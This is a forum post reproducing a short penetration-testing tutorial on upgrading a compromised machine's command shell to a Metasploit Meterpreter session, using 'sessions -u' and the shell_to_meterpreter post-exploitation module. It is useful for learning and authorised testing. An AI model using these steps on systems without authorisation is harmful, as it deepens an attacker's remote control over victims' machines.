• We just launched and are currently in beta. Join us as we build and grow the community.

How to Upgrade Command Shell to Meterpreter

HE1

Microservice Architect
H Rep
0
0
0
Rep
0
H Vouches
0
0
0
Vouches
0
Posts
140
Likes
50
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 500 XP
In network penetration testing, we always wish to hack a system of an internal network and try to make unauthorized access through a meterpreter session using the Metasploit framework. But there are some exploits which will directly provide victim’s command shell instead of meterpreter session. In this article, we have tried to upgrade from the victim’s shell to a meterpreter shell.

Now once we have access to victims command shell then follow the steps given below to upgrade a command shell into the meterpreter shell.

Here I already have access to command shell of victim’s PC

1.png


So now we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Execute the following command for session manipulation.

Code:
sessions -u 1

2.png


Other Way

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected.

Code:
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit

3.png


Author: Pinky Deka is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here
 

452,158

323,328

323,337

Top